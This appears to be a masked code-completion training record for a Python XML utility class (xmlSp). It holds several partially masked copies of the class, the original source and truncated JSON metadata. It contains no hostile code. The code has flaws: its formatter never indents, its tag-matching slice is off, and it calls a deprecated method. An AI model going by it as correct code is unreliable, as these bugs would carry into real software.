fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
<|reserved_special_token_0|>
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
<|reserved_special_token_0|>
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
<|reserved_special_token_0|>
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
<|reserved_special_token_0|>
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
def __fetchNodeNameFromStr(self, str):
str = str[1:len(str) - 1]
nodeName = str.replace('/', '')
return nodeName
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
def fetchXmlNodeTree(self, xmlPathOrXmlStr):
if xmlPathOrXmlStr == '':
return None
elif os.path.isfile(xmlPathOrXmlStr):
return ElementTree.parse(xmlPathOrXmlStr)
else:
return ElementTree.fromstring(xmlPathOrXmlStr)
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):
xmlStr = xmlStr.replace('\n', '')
xmlStruct1 = self.__analyNodeFlag(xmlStr)
if xmlStruct1 != None:
xmlNode1 = xmlStruct1[0]
xmlRestStr1 = xmlStruct1[1]
xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)
xmlNode2 = xmlStruct2[0]
xmlRestStr2 = xmlStruct2[1]
xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)
xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]
isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)
nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)
nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)
if not nodeName1 in nodeList:
nodeList.append(nodeName1)
if not nodeName2 in nodeList:
nodeList.append(nodeName2)
nodeName1Floor = nodeList.index(nodeName1, 0)
nodeName2Floor = nodeList.index(nodeName2, 0)
space = ''
if len(xmlNode1) > 0:
if isPair:
for index in range(nodeName1Floor):
xmlNode1 = space + xmlNode1
fileWrite.write(xmlNode1 + '\n')
if len(xmlInnerText) > 0:
if isPair:
for index in range(nodeName1Floor + 1):
xmlInnerText = space + xmlInnerText
fileWrite.write(xmlInnerText + '\n')
if len(xmlNode2) > 0:
for index in range(nodeName2Floor):
xmlNode2 = space + xmlNode2
fileWrite.write(xmlNode2 + '\n')
self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
def __fetchNodeNameFromStr(self, str):
str = str[1:len(str) - 1]
nodeName = str.replace('/', '')
return nodeName
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
_exception = None
<|reserved_special_token_0|>
class xmlSp:
def addNode(self, parentNode, childNode):
parentNode.append(childNode)
def createChildNode(self, key, value, propertyMap={}):
element = Element(key, propertyMap)
element.text = value
return element
def fetchXmlNodeTree(self, xmlPathOrXmlStr):
if xmlPathOrXmlStr == '':
return None
elif os.path.isfile(xmlPathOrXmlStr):
return ElementTree.parse(xmlPathOrXmlStr)
else:
return ElementTree.fromstring(xmlPathOrXmlStr)
def fetchSingleNode(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.find(xpathOrKey)
else:
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self, nodeTree, xpathOrKey):
node = self.fetchSingleNode(nodeTree, xpathOrKey)
if node == None or len(node) <= 0 or node == '':
return ''
else:
return node.text
def fetchNodeList(self, nodeTree, xpathOrKey):
if xpathOrKey == None or xpathOrKey == '':
return None
elif len(xpathOrKey.split('/')) > 1:
return nodeTree.findall(xpathOrKey)
else:
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):
if xpathOrKey == None or xpathOrKey == '':
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree, xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath, 'r', encoding=charset)
fileWrite = open(destXmlPath, 'w', encoding=charset)
lines = fileRead.read()
nodeList = []
self.__writeXmlStruct(lines, nodeList, fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):
xmlStr = xmlStr.replace('\n', '')
xmlStruct1 = self.__analyNodeFlag(xmlStr)
if xmlStruct1 != None:
xmlNode1 = xmlStruct1[0]
xmlRestStr1 = xmlStruct1[1]
xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)
xmlNode2 = xmlStruct2[0]
xmlRestStr2 = xmlStruct2[1]
xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)
xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]
isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)
nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)
nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)
if not nodeName1 in nodeList:
nodeList.append(nodeName1)
if not nodeName2 in nodeList:
nodeList.append(nodeName2)
nodeName1Floor = nodeList.index(nodeName1, 0)
nodeName2Floor = nodeList.index(nodeName2, 0)
space = ''
if len(xmlNode1) > 0:
if isPair:
for index in range(nodeName1Floor):
xmlNode1 = space + xmlNode1
fileWrite.write(xmlNode1 + '\n')
if len(xmlInnerText) > 0:
if isPair:
for index in range(nodeName1Floor + 1):
xmlInnerText = space + xmlInnerText
fileWrite.write(xmlInnerText + '\n')
if len(xmlNode2) > 0:
for index in range(nodeName2Floor):
xmlNode2 = space + xmlNode2
fileWrite.write(xmlNode2 + '\n')
self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)
def __analyNodeFlag(self, sourceStr):
global _exception
_exception = None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node = sourceStr[nodeBegin:nodeEnd + 1]
nodeInnerText = sourceStr[nodeEnd + 1:]
return [node, nodeInnerText]
else:
return ['', sourceStr]
except BaseException as error:
_exception = error
return None
def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):
if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:
nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]
nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]
nodeFlag1 = nodeFlag1.replace('/', '')
nodeFlag2 = nodeFlag2.replace('/', '')
if nodeFlag1 == nodeFlag2:
return True
return False
def __fetchNodeNameFromStr(self, str):
str = str[1:len(str) - 1]
nodeName = str.replace('/', '')
return nodeName
def modifyNodeValue(self, node, newValue, isAppend=False):
if node == None:
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self, nodeTree, outPath, charset='utf-8'):
global _exception
_exception = None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception = error
return False
<|reserved_special_token_1|>
#-*- coding:utf-8 -*-
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
_exception = None
import os
class xmlSp:
def addNode(self,parentNode,childNode):
parentNode.append(childNode)
def createChildNode(self,key,value,propertyMap={}):
element = Element(key,propertyMap)
element.text = value
return element
def fetchXmlNodeTree(self,xmlPathOrXmlStr):#Load xml has 2 ways.First:load xml string.Second:load xml file.
if(xmlPathOrXmlStr == ""):
return None
elif(os.path.isfile(xmlPathOrXmlStr)):#is xmlPath
return ElementTree.parse(xmlPathOrXmlStr)
else:#is xmlStr
return ElementTree.fromstring(xmlPathOrXmlStr)
def fetchSingleNode(self,nodeTree,xpathOrKey):#If the node that is same name is more,return first node.
if xpathOrKey == None or xpathOrKey == "":
return None
elif len(xpathOrKey.split('/')) > 1:#is xpath
return nodeTree.find(xpathOrKey)#find is faster than findall then return first
else:#is key
nodeList = nodeTree.getiterator(xpathOrKey)
if nodeList == None or len(nodeList) <= 0:
return nodeList
else:
return nodeList[0]
def fetchSingleNodeValue(self,nodeTree,xpathOrKey):#If the node that is same name is more,return first node.
node = self.fetchSingleNode(nodeTree,xpathOrKey)
if node == None or len(node) <= 0 or node == "":
return ""
else:
return node.text
def fetchNodeList(self,nodeTree,xpathOrKey):
if xpathOrKey == None or xpathOrKey == "":
return None
elif len(xpathOrKey.split('/')) > 1:#is xpath
return nodeTree.findall(xpathOrKey)
else:#is key
return nodeTree.getiterator(xpathOrKey)
def fetchNodeValueList(self,nodeTree,xpathOrKey,key=""):#If xpathOrKey is xpath,key must be not empty.Otherwise return empty set
if xpathOrKey == None or xpathOrKey == "":
return None
else:
nodeValueList = []
nodeList = self.fetchNodeList(nodeTree,xpathOrKey)
for node in nodeList:
if node.tag == xpathOrKey:
nodeValueList.append(node.text)
return nodeValueList
def format(self,sourceXmlPath,destXmlPath,charset='UTF-8'):
global _exception
_exception = None
if os.path.exists(sourceXmlPath):
try:
fileRead = open(sourceXmlPath,'r',encoding=charset)
fileWrite = open(destXmlPath,'w',encoding=charset)
lines = fileRead.read()
nodeList=[]
self.__writeXmlStruct(lines,nodeList,fileWrite)
fileRead.close()
fileWrite.close()
return True
except BaseException as error:
_exception = error
return False
else:
_exception = BaseException('File not exist!')
return False
def __writeXmlStruct(self,xmlStr,nodeList,fileWrite):
xmlStr=xmlStr.replace('\n','')
xmlStruct1=self.__analyNodeFlag(xmlStr)
if xmlStruct1!=None:
xmlNode1=xmlStruct1[0]
xmlRestStr1=xmlStruct1[1]
xmlStruct2=self.__analyNodeFlag(xmlRestStr1)
xmlNode2=xmlStruct2[0]
xmlRestStr2=xmlStruct2[1]
xmlInnerTextEnd=xmlRestStr1.find(xmlNode2)
xmlInnerText=xmlRestStr1[:xmlInnerTextEnd]
isPair=self.__checkNodeFlagIsPair(xmlNode1,xmlNode2)
nodeName1=self.__fetchNodeNameFromStr(xmlNode1)
nodeName2=self.__fetchNodeNameFromStr(xmlNode2)
if not (nodeName1 in nodeList):
nodeList.append(nodeName1)
if not (nodeName2 in nodeList):
nodeList.append(nodeName2)
nodeName1Floor=nodeList.index(nodeName1,0)
nodeName2Floor=nodeList.index(nodeName2,0)
space=''
if len(xmlNode1)>0:
if isPair:
for index in range(nodeName1Floor):
xmlNode1=space+xmlNode1
fileWrite.write(xmlNode1+'\n')
if len(xmlInnerText)>0:
if isPair:
for index in range(nodeName1Floor+1):
xmlInnerText=space+xmlInnerText
fileWrite.write(xmlInnerText+'\n')
if len(xmlNode2)>0:
for index in range(nodeName2Floor):
xmlNode2=space+xmlNode2
fileWrite.write(xmlNode2+'\n')
self.__writeXmlStruct(xmlRestStr2,nodeList,fileWrite)
def __analyNodeFlag(self,sourceStr):
global _exception
_exception=None
try:
nodeBegin = sourceStr.find('<')
nodeEnd = str(sourceStr).find('>')
if nodeBegin >= 0 and nodeEnd > 0:
node =sourceStr[nodeBegin:nodeEnd+1]
nodeInnerText=sourceStr[nodeEnd+1:]
return [node,nodeInnerText]
else:
return ["",sourceStr]
except BaseException as error:
_exception=error
return None
def __checkNodeFlagIsPair(self,nodeFlag1,nodeFlag2):
if len(nodeFlag1)>0 and len(nodeFlag2)>0:
nodeFlag1=nodeFlag1[1:(len(nodeFlag1)-2)]
nodeFlag2=nodeFlag2[1:(len(nodeFlag2)-2)]
nodeFlag1=nodeFlag1.replace('/','')
nodeFlag2=nodeFlag2.replace('/','')
if nodeFlag1==nodeFlag2:
return True
return False
def __fetchNodeNameFromStr(self,str):
str=str[1:(len(str)-1)]
nodeName=str.replace('/','')
return nodeName
def modifyNodeValue(self,node,newValue, isAppend=False):
if(node == None):
return False
else:
try:
if isAppend:
node.text += newValue
else:
node.text = newValue
return True
except:
return False
def writeXml(self,nodeTree, outPath,charset="utf-8"):
global _exception
_exception=None
try:
nodeTree.write(outPath, encoding=charset)
return True
except BaseException as error:
_exception=error
return False
#import os
#if __name__ == '__main__':
# myxml = xmlSp()
# formatResult = myxml.format("1.txt","2.txt")
# if not formatResult:
# print(_exception)
# else:
# os.remove("1.txt")
# os.rename('2.txt','1.txt')
## xmlPath= "..\\article\\articleList.xml";
## nodeTree = myxml.fetchXmlNodeTree(xmlPath)
## #nodeTree=
## #myxml.fetchXmlNodeTree("<artilceList><article><id>aaaa</id></article></artilceList>")
## #node=myxml.fetchSingleNode(nodeTree,'article/id')
## #if len(node)<=0:
## # print("empty")
## #print(node)
## #nodeList = myxml.fetchNodeList(nodeTree,'id')
## #myxml.modifyNodeValue(nodeList[0],'bbbb')
## #myxml.writeXml(nodeTree,xmlPath)
## #rootNode=myxml.fetchSingleNode(nodeTree,'articleList')
## #idNode=myxml.createChildNode('id','aaabbbb')
## #nameNode=myxml.createChildNode('name','aaabbbb')
## #parentNode=myxml.createChildNode('article','')
## #myxml.addNode(parentNode,idNode)
## #myxml.addNode(parentNode,nameNode)
## #myxml.addNode(rootNode,parentNode)
## #myxml.writeXml(nodeTree,'aaa.xml')
## #for node in nodeList:
## # print("node:%s" %node)
## #nodeValueSet=fetchNodeValueSet(nodeTree,'article/id')
## #for nodeValue in nodeValueSet:
## # print ("nodeValue:%s" %nodeValue)
#import os
#os.system("PAUSE")
|
flexible
|
{
"blob_id": "0470f98247f8f835c0c052b01ddd7f1f7a515ab5",
"index": 5509,
"step-1": "<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n <mask token>\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n <mask token>\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n <mask token>\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-2": "<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n <mask token>\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n <mask token>\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n\n def __fetchNodeNameFromStr(self, str):\n str = str[1:len(str) - 1]\n nodeName = str.replace('/', '')\n return nodeName\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-3": "<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n\n def fetchXmlNodeTree(self, xmlPathOrXmlStr):\n if xmlPathOrXmlStr == '':\n return None\n elif os.path.isfile(xmlPathOrXmlStr):\n return ElementTree.parse(xmlPathOrXmlStr)\n else:\n return ElementTree.fromstring(xmlPathOrXmlStr)\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n\n def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):\n xmlStr = xmlStr.replace('\\n', '')\n xmlStruct1 = self.__analyNodeFlag(xmlStr)\n if xmlStruct1 != None:\n xmlNode1 = xmlStruct1[0]\n xmlRestStr1 = xmlStruct1[1]\n xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)\n xmlNode2 = xmlStruct2[0]\n xmlRestStr2 = xmlStruct2[1]\n xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)\n xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]\n isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)\n nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)\n nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)\n if not nodeName1 in nodeList:\n nodeList.append(nodeName1)\n if not nodeName2 in nodeList:\n nodeList.append(nodeName2)\n nodeName1Floor = nodeList.index(nodeName1, 0)\n nodeName2Floor = nodeList.index(nodeName2, 0)\n space = ''\n if len(xmlNode1) > 0:\n if isPair:\n for index in range(nodeName1Floor):\n xmlNode1 = space + xmlNode1\n fileWrite.write(xmlNode1 + '\\n')\n if len(xmlInnerText) > 0:\n if isPair:\n for index in range(nodeName1Floor + 1):\n xmlInnerText = space + xmlInnerText\n fileWrite.write(xmlInnerText + '\\n')\n if len(xmlNode2) > 0:\n for index in range(nodeName2Floor):\n xmlNode2 = space + xmlNode2\n fileWrite.write(xmlNode2 + '\\n')\n self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)\n\n def 